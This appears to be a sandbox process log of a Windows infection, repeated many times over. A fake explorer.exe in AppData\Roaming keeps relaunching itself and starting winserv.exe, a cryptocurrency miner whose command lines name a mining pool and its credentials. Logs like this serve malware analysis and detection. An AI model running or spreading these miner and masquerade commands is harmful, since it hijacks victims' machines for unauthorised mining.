C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
